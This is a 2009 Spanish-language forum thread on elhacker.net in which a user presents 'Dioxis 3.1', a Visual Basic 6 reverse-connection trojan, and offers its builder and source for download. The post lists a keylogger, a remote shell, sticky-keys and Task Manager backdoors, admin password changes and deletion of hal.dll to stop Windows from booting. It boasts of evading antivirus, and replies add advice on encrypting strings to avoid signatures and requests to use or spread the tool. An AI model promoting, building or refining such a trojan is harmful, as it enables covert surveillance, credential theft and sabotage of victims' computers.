elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 10:56  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  [VB 6.0] Dioxis 3.1 by 50l3r ^^
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [VB 6.0] Dioxis 3.1 by 50l3r ^^  (Leído 3,101 veces)
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
[VB 6.0] Dioxis 3.1 by 50l3r ^^
« en: 2 Junio 2009, 23:54 »







Tamaño servidor: 104 KB
Tamaño Cliente: 848 KB
Archivos: Cliente Dioxis
Lenguaje: Visual Basic 6.0
Conexion: Inversa
Tiempo de Reconexion: Personalizada
Tiempo de Refresco de fin de conexion: 1 segundo
Idioma: Español
Puerto usado: Personalizado
Infraestructura: Red Local e internet



Funciones automatizadas:

Ejecucion de:

  • Paint
  • Teclado Universal
  • Buscaminas
  • Solitario
  • Pinball
  • Calculadora
  • Paseo de Win Xp
  • Star Wars
  • Mensajes personalizados
  • Paginas Web

Matanza de Procesos:


  • Messenger
  • Navegadores (Firefox,Iexplorer,Safari, Opera y Google chrome)
  • Explorador de Windows
  • Proceso Personalizado

Creacion de Puertas Traseras:

  • Habilitar terminal server
  • Establecer una cmd en sticky keys (compaginado con ts, tienes el control total del pc)
  • Establecer una cmd en vez del administrador de tareas (para que no pueda ver las tareas)

Sistema:

  • Edicion de la contraseña de administracion a la que se quiera
  • Cierre de Sesion
  • Apagar Pc
  • ELIMINAR HAL.DLL (No se iniciara windows si no es reparado :/ )



Otras Funciones

  • Keylogger
  • Shell Remota
  • Creacion de archivos remotamente



¿Que es Dioxis?


Dioxis, aun siendo un software simple como pueden ver, tiene bastante potencial y actualmente esta muy escondido de los antivirus, cosa que a la hora de escoger un troyano, buscamos mas

Este software coge el control total o medio parcial de la cpu, podiendo tener una shell remota, manejando el archivo de losg del teclado, creando archivos...etc

Dioxis posee funciones automatizadas para los menos adentrados en este mundillo, estas funciones se dividen en 3 tipos:

Modo funny: El modo divertido ^^,si eres una buena persona y no te atrae la destruccion, cosa que se premia mucho en este mundillo, este modo te ayudara con tus tareas, posee funciones como ejecucion de aplicaciones, ejecutar pelicula de star wars o mandarle mensajes personalizados


Modo Normal: Este modo esta dedicado a la matanza de procesos que corren en el pc remoto y a abrir paginas web o cerrar sesion, un poco mas cruel que el funny mod pero util si quieres pillar contraseñas de msn por ejemplo, cosa muy tipica


Modo Dioxis: El dioxis mod, seria en teoria la forma mas cruel de usar este software, consta ge generar backdoors, apagar el pc, eliminar el hal.dll...etc

He evitado en este modo hacer las cosas crueles ya que este software aun no es detectado ^^ abstenganse gente cruel :P


¿Detectado?

Analizado con los siguientes antivirus,sigue sin detectarse, pero al parecer surge adevertencia al tener el avira en heuritica profesional (dictado por novirusthanks)

Norton 2009:

Nod 32:


Panda 2009:


Avast:

Kapersky Internet Security:


Avira:  :D


Bit Defender:




Analisis con virusthanks

Al parecer, si al avira le colocas la heuristica al maximo lo detecta aun dando vuelta a las cadenas para copiar al inicio, por ahora los resultados son estos:


un resultado nada mas que satisfactorio al tatarse de un troyano hecho por mi :/ xD

el server siempre es el mismo, solo varia algunas cadenas, asi que el analisis es el mismo de siempre, cuando vuelva a estar activa novirusthanks subo el mas reciente




Comentarios Finales

La estructura de conexion del troyano esta realizada mediante csocketmaster para evitar la compilacion

AHORA PODRAS DISFRUTAR DE TU SERVIDOR COMPLETO SIN NECESIDAD DE COMPILAR NADA ^^

Las cadenas para agregar al inicio estan "Reverse" para evitar la heuristica media del avira y de todos los antivirus

La interfaz es amigable y ofrece mucha facilidad

Servidor

Como bien dije y lo vuelvo a repetir, ya que la gente no se leera todo, pocas seran las personas:

el servidor se crea dandole a la mariquita, solo hace falta definir tu ip, puerto y tiempo de reconexion. Si tienes router o firewall no te olvides de abrirle paso al troyano

Dudas sugerencias u otros, comenten ^^ no duele










Codigo Fuente


PD: Arreglo a version 3.1 debido a errores en la conexion, arreglados con ayuda de karcrack ;)
« Última modificación: 3 Junio 2009, 21:06 por 50l3r » En línea

fede_cp


Desconectado Desconectado

Mensajes: 526


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: [VB 6.0] Dioxis 3.0 by 50l3r ^^
« Respuesta #1 en: 3 Junio 2009, 14:57 »

Muy bien 5ol3r te felicito, lograste hacer el server con el Csocketmaster a pesar de algunos problemas de los que tenías, me gusto mucho la idea del keylegger y de la shell, para mi las doas funciones mejores de dioxis.

un saludo y quiero ver tu proximo programa eh!

adios
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.132


Se siente observado ¬¬'


Ver Perfil
Re: [VB 6.0] Dioxis 3.0 by 50l3r ^^
« Respuesta #2 en: 3 Junio 2009, 17:30 »

Buen trabajo... si que has avanzado  :D!

Bueno.. te doy unos consejos de programador... Utiliza 'Option Explicit', no uses controles para almacenar información.. para eso estan las variables... aligeras mucho el code...

Y este es el scan de NVT... el tuyo esta empaquetado con RAR...
Citar
File Info

Report generated: 3.6.2009 at 17.30.20 (GMT 1)
Filename: servidor.exe
File size: 104 KB
MD5 Hash: EE4A47D82F44F24AAD4CCA217A47AF6A
SHA1 Hash: 627B8A6CEDE62B524BA18F3BEE3306CF2215AE3E
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector:  Nothing found
Detection rate: 2 on 24

Detections

a-squared - Backdoor.Win32.RShot!IK
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found!  
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Backdoor.Win32.RShot
Kaspersky - Nothing found!
McAfee - Nothing found!  
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!  
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!    
Virus Buster - Nothing found!

Scan report generated by  
NoVirusThanks.org


Te recomiendo pasarle el KPC... hay muchas cadenas sin cifrar...

Me parece que 100kb sigue siendo mucho... :-\ Si quieres ya hablamos por MSN de como optimizar el tamaño y tal.. (si es que te tengo agregado :laugh: :laugh:, últimamente me agrega mucha gente :¬¬ :xD)

Saludos :D
« Última modificación: 3 Junio 2009, 17:38 por Karcrack » En línea

50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: [VB 6.0] Dioxis 3.0 by 50l3r ^^
« Respuesta #3 en: 3 Junio 2009, 17:47 »

Código:
Te recomiendo pasarle el KPC... hay muchas cadenas sin cifrar...

um ahi no te entendi, a que te refieres a cifrar mas cadenas que pueden detectar los av?

pues me vendria bien depurar un poco el codigo y demas, te mando mi msn por mp y nos ponemos en contacto


y gracias por el scan jeje
En línea

Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.132


Se siente observado ¬¬'


Ver Perfil
Re: [VB 6.0] Dioxis 3.0 by 50l3r ^^
« Respuesta #4 en: 3 Junio 2009, 17:53 »

Código:
Te recomiendo pasarle el KPC... hay muchas cadenas sin cifrar...

um ahi no te entendi, a que te refieres a cifrar mas cadenas que pueden detectar los av?

pues me vendria bien depurar un poco el codigo y demas, te mando mi msn por mp y nos ponemos en contacto


y gracias por el scan jeje

Siempre es bueno cifrar cadenas, aunque no sean de por si detectadas las empresas de AVs las utilizan (a menudo) para crear firmas... aunque últimamente les da por tocar el PE y usar heuristica... asi que bueno.. siempre viene bien...

Te agrego y charlamos cuando tenga algo de tiempo ;)
En línea

Carolinda87

Desconectado Desconectado

Mensajes: 2



Ver Perfil
Re: [VB 6.0] Dioxis 3.1 by 50l3r ^^
« Respuesta #5 en: 12 Junio 2009, 02:53 »

Me encantaría poder usarlo...
En línea
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: [VB 6.0] Dioxis 3.1 by 50l3r ^^
« Respuesta #6 en: 12 Junio 2009, 08:04 »

la verdad que ha salido bueno ^^
En línea

WaRc3L


Desconectado Desconectado

Mensajes: 334


Ver Perfil
Re: [VB 6.0] Dioxis 3.1 by 50l3r ^^
« Respuesta #7 en: 12 Junio 2009, 21:39 »

me encantan tu manera de hacer los graficos 50l3r, yo nunca trabaje con graficos, espero que quando lo haga puede llegar a tus niveles  :o

De verdad, me encantan  ;-)

Felicidades por el proyecto y por los graficos!

Saludos!

WaRc3L
En línea

La verdad no se refleja en un espejo
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: [VB 6.0] Dioxis 3.1 by 50l3r ^^
« Respuesta #8 en: 13 Junio 2009, 10:03 »

muchas gracias ^^

bueno al parecer por lo que me han contado, unos 6 av lo detectan ya

estoy haciendo la siguiente version y ya he conseguido cambiar el keylogerr con hook, haber si para esta version tambien puedo meter el transferir archivos

porcierto la nueva version actualmente la detectan 2 av, estoy corrigiendo eso

hasta que novirusthanks me deje subir mas pruebas ^^
« Última modificación: 13 Junio 2009, 14:16 por 50l3r » En línea

Bakura182

Desconectado Desconectado

Mensajes: 254


No existe gran talento sin gran voluntad-Honoré B.


Ver Perfil
Re: [VB 6.0] Dioxis 3.1 by 50l3r ^^
« Respuesta #9 en: 14 Junio 2009, 02:28 »

wow la verdad que que se ve muy interesante y potente, lo descargare :D

Te importa si subo tu troyano a mi foro?  ;)



EDITO: @echo xD  ;)
« Última modificación: 14 Junio 2009, 03:15 por Bakura182 » En línea
50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: [VB 6.0] Dioxis 3.1 by 50l3r ^^
« Respuesta #10 en: 14 Junio 2009, 09:51 »

subele si quieres, claro esta, pero respeta el autor ;)

aun asi no tardare mucho tampoco en sacar la ultima version ya que esta esta un poco detectada y el keylogger va por timers en vez de hooks, eso es por lo que por ahora he mejroado en el trojan
En línea

Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.132


Se siente observado ¬¬'


Ver Perfil
Re: [VB 6.0] Dioxis 3.1 by 50l3r ^^
« Respuesta #11 en: 14 Junio 2009, 10:05 »

subele si quieres, claro esta, pero respeta el autor ;)

aun asi no tardare mucho tampoco en sacar la ultima version ya que esta esta un poco detectada y el keylogger va por timers en vez de hooks, eso es por lo que por ahora he mejroado en el trojan
Ademas de aquello de las variables usando controles :rolleyes: (Recuerda el MSN :laugh:)

Enga, sigue asi :P
En línea

50l3r


Desconectado Desconectado

Mensajes: 758


Todo lo que se por la cuarta parte que desconozco


Ver Perfil WWW
Re: [VB 6.0] Dioxis 3.1 by 50l3r ^^
« Respuesta #12 en: 14 Junio 2009, 12:16 »

ya tambien jj
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines